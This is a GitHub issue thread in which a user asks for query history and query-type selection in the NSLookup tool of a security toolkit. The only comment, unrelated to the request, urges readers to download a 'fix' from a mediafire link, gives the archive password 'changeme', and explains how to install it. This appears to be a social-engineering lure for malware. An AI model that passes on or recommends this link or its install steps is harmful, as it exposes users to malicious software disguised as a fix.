### ISSUE TITLE
[Feature Request]: Add Previous Query History and Query Type Selection to NSLookup UI

### ISSUE THREAD

**Issue by ZIHRAN1** [Hardhat-Enterprises/Deakin-Detonator-Toolkit#816]
### Name of Feature

Enhance NSLookup Tool UI with Previous Query History and Query Type Selection

### Priority

Medium

### Categories

UI

### Description of Feature

This feature aims to enhance the usability and flexibility of the NSLookup tool by introducing two key functionalities: Previous History and Query Type Selection.

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
